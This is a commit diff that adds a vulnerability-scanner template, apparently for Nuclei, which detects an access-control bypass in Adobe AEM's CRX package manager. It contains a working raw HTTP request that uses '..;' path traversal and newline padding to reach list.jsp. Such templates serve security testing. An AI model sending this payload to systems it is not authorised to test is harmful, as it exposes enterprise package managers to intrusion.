Create aem-crx-bypass.yaml
parent
ae02065c0c
commit
91b673ad17
|
@ -0,0 +1,22 @@
|
|||
id: aem-crx-bypass
|
||||
|
||||
info:
|
||||
author: dhiyaneshDK
|
||||
name: AEM CRX Bypass
|
||||
severity: critical
|
||||
reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
|
||||
tags: aem
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
||||
Referer: {{BaseURL}}
|
||||
Connection: close
|
||||
Accept-Encoding: gzip, deflate
|
||||
matchers:
|
||||
- type: word
|
||||
word:
|
||||
- "results:"
|
Loading…
Reference in New Issue